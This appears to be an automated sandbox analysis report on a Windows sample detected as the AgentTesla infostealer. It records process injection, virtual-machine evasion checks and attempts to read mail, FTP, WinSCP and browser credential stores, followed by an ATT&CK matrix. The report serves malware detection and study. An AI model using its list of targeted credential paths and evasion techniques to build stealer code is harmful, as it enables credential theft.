                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6940Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 2557 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 7299 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2557
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 7299
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: Amcache.hve.10.drBinary or memory string: VMware
                      Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.10.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 0000000A.00000002.300816441.0000000005020000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016BCB20 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 438000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: FD0008
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Users\user\Desktop\W7UbgU8x18.exe VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection312Disable or Modify Tools1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Input Capture1Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Credentials in Registry1Security Software Discovery121SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSProcess Discovery2Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

